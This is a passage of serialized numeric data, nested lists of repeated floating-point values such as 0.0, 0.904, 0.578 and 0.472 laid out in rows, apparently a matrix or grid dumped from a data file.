- 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.9044030984144017, - 
0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.9044030984144017, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.03706410007949775, - 
0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.0, - 0.0, - 0.0, - 0.0, 
- 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 
0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 
0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.5780729041010304, - 0.5780729041010304, - 
0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.5780729041010304, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.03706410007949775, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - ], - [ - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - ], - [ - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - ], - [ - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - ], - [ - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 
0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - ], - [ - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - ], - [ - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.4724172299368354, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - 0.5148839775509372, - ], - [ - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 0.0, - 